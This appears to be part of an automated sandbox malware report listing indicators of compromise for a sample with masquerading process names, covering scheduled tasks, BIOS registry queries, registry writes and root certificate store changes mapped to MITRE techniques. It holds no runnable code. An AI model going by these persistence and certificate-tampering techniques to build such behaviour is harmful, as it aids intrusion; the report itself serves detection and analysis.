schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1756 schtasks.exe
2924 schtasks.exe
3008 schtasks.exe
1972 schtasks.exe
2272 schtasks.exe
1496 schtasks.exe
2676 schtasks.exe
1328 schtasks.exe

pid	process
1756	schtasks.exe
2924	schtasks.exe
3008	schtasks.exe
1972	schtasks.exe
2272	schtasks.exe
1496	schtasks.exe
2676	schtasks.exe
1328	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exewindefender.exewscript.exe1WhdhWgOS4WRGRR6OOPxuF3j.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	1WhdhWgOS4WRGRR6OOPxuF3j.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

csrss.exepatch.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
